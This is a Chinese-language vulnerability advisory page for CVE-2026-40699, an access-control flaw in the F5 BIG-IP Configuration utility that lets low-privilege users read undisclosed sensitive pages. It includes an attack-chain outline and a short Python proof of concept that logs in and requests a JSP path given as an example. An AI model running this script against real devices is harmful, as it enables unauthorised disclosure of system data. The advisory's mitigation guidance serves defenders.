CVE-2026-40699 CVSS 6.5 中危

CVE-2026-40699 F5 BIG-IP配置实用程序信息泄露漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40699

漏洞类型

信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP

漏洞概述

F5 BIG-IP配置实用程序中存在一处安全漏洞，允许经过身份验证的低权限攻击者访问未公开页面中的敏感信息。该漏洞源于对特定URL路径的访问控制不当，攻击者无需用户交互即可通过网络利用此漏洞。此问题可能导致系统敏感配置或运行数据泄露，但不会影响系统的完整性和可用性。

技术细节

该漏洞的核心原理在于F5 BIG-IP配置实用程序（Configuration utility）的Web服务器未能对特定未公开页面实施严格的权限验证。虽然这些页面包含敏感信息，但访问控制列表（ACL）配置存在缺陷，允许权限较低的用户直接访问。攻击者首先需要拥有一个合法的低权限账号并登录系统。随后，通过直接构造HTTP请求向目标未公开端点发送数据，服务器端在处理请求时未校验会话所需的权限等级，从而导致敏感数据被返回。由于CVSS向量为AV:N/AC:L/PR:L/UI:N/S:U，表明利用难度较低，且仅需网络访问即可。

攻击链分析

STEP 1

攻击者获取F5 BIG-IP设备的一个低权限用户账号凭证。

STEP 2

攻击者使用该凭证登录配置实用程序，建立有效的会话。

STEP 3

攻击者构造特定的HTTP请求，直接访问未公开的敏感页面路径。

STEP 4

服务器端未正确拦截请求，返回了本应受限制的敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: CVE-2026-40699 F5 BIG-IP Information Disclosure
# Description: PoC to access undisclosed sensitive pages with low privileges

url = "https://<target-ip>/tmui/Control/jspmap/tmui/system/archive/properties.jsp"  # Example undisclosed page
session = requests.Session()

# Attacker credentials (low privilege)
payload = {
    'username': 'low_priv_user',
    'passwd': 'password'
}

# 1. Authenticate to get the session cookie
login_url = "https://<target-ip>/tmui/login.jsp"
login_response = session.post(login_url, data=payload, verify=False)

if login_response.status_code == 200:
    # 2. Access the undisclosed sensitive page
    vuln_response = session.get(url, verify=False)
    
    if vuln_response.status_code == 200:
        print("[+] Successfully accessed sensitive page!")
        print("[+] Response Content:")
        print(vuln_response.text)
    else:
        print("[-] Failed to access the page.")
else:
    print("[-] Login failed.")

影响范围

请参考厂商安全公告 K000156734 获取详细版本列表

防御指南

临时缓解措施

建议在应用补丁前，通过管理访问控制列表（ACL）严格限制配置实用程序的访问权限，仅允许受信任的管理员IP地址连接，以降低被低权限账号滥用的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-40699
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-40699
3 Details https://www.cvedetails.com/cve/CVE-2026-40699/
4 VulDB https://vuldb.com/cve/CVE-2026-40699
5 Link https://my.f5.com/manage/s/article/K000156734

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表